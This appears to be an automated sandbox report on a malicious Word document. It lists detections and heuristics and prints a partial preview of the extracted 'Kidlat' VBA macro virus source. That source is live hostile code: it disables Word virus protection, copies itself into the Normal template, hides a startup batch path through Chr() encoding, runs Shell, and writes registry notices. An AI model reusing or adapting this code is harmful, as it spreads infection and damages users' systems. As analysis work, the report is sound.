MALICIOUS
400
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains heavily obfuscated VBA macros with AutoOpen and AutoClose functions, indicative of a malicious document. Critical heuristics indicate the use of Shell() calls and an obfuscated loader designed to execute code. The script attempts to export a file to 'c:\Kidlat.drv' and includes a URL that may be used for payload retrieval. The ClamAV detection 'Win.Trojan.Pivis-2' further supports its malicious nature.
Heuristics 8
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32369 bytes |
SHA-256: 2b3d0d822ed2d40baf8c0197e3c9ccfbe8c2bacdb2bc7be67b2eefaf28773432 |
|||
|
Detection
ClamAV:
Doc.Trojan.VMPCK2-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Kidlat"
Public Skip As Integer
Rem MfQeUsHeUnEgQqBoRgTpLyKnErOhFgJxQi
Sub Kidlat()
'+++++++++++++++++++++++++++++++++++++++++++++++++++
Rem TkRlOmOoRzFjSzRmSpHoQuQvHgDpFyQyJzQjLpLiTvVoLz
'Virus Name: Kidlat
'Author: Lucky Warrior
Rem NvSwEhRzMeSsHeFuJtLeRnShEkNsNvHiLgNvOkNyAzIkCiBfFpLmFnBj
'Copyright (c) 1999 Bgy. Tiguib, Oras, Eastern Samar
'All rights reserved.
'+++++++++++++++++++++++++++++++++++++++++++++++++++
'Many Thanx To my Friends & Roommates, namely:
'Tom, Deo, Allan, ArnoldBig, ArnoldSmall, Mike & Ruel
'A Special Thanx To... HCA Batch '95 (O.E.S)
'And a Very Special Thanx To... Pamela
On Error Resume Next
Randomize
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("Kidlat").Export "c:\Kidlat.drv"
Rem PoNgPfQnJwRnIfCyTjOoMiNlJjJqMwVnUeAxJtUsGtLfLlJsTfLqUqLtEwUnAyJlDlDo
ActiveDocument.ReadOnlyRecommended = False
DyMs = Int(Rnd * 10)
If DyMs = 3 Then Call AdditionalSideEffects
If Month(Now) = 8 And Day(Now) = 13 Then MsgBox "Happy Birthday Lucky Warrior!!!", vbInformation, "Microsoft Team Says..."
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Lucky Warrior"
.Comments = "Kidlat"
.Execute
Rem HvNlEoUxQwFqItIfEnBtFkNsFrPgKtJrEhQhRuUuTxJxQiVe
End With
MakeIt$ = Chr(99) + Chr(58) + Chr(92) + Chr(119) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(115) + Chr(116) + Chr(97) + Chr(114) + Chr(116) + Chr(109) + Chr(126) + Chr(49) + Chr(92) + Chr(112) + Chr(114) + Chr(111) + Chr(103) + Chr(114) + Chr(97) + Chr(109) + Chr(115) + Chr(92) + Chr(115) + Chr(116) + Chr(97) + Chr(114) + Chr(116) + Chr(117) + Chr(112) + Chr(92) + Chr(109) + Chr(115) + Chr(102) + Chr(105) + Chr(108) + Chr(101) + Chr(46) + Chr(98) + Chr(97) + Chr(116)
YouNeedME = GetAttr(NormalTemplate.FullName)
Rem VkHeLhOkIoCsNqVrBkJpNnFlJoQuJrAqGhGlMqQhPsIv
If YouNeedME = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call Damn(MakeIt$)
If YouNeedME = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call Damn(MakeIt$)
If YouNeedME = vbReadOnly Then GoTo SuckIt
If YouNeedME = vbReadOnly + vbArchive Then GoTo SuckIt
If NormalTemplate.VBProject.VBComponents.Item("Kidlat").Name <> "Kidlat" Then YouHateMe = True
If ActiveDocument.VBProject.VBComponents.Item("Kidlat").Name <> "Kidlat" Then IHateYou = True
If YouHateMe = True And IHateYou = False Then Set CallOff = NormalTemplate.VBProject.VBComponents
If YouHateMe = False And IHateYou = True Then Set CallOff = ActiveDocument.VBProject.VBComponents
CallOff.import "c:\Kidlat.drv"
If YouHateMe = True And IHateYou = False Then Shell ("label c: Kidlat"), 0
If YouHateMe = False And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If IHateYou = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
Rem UxJqByLoDtPtUkKxBlRxQeEuMzNnUxChEuTxQhQgNfMsTlDjClIoUtJiCnHvRpAhQg
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "Lucky Warrior"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "Kidlat is now ready to fuck your system!!!"
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Templates and add-ins...").Delete
SuckIt:
End Sub
Sub FuckTheAV()
On Error Resume Next
Randomize
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("Kidlat").CodeModule.CountOfLines
If ActiveLines > 300 Then
With Applicati
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.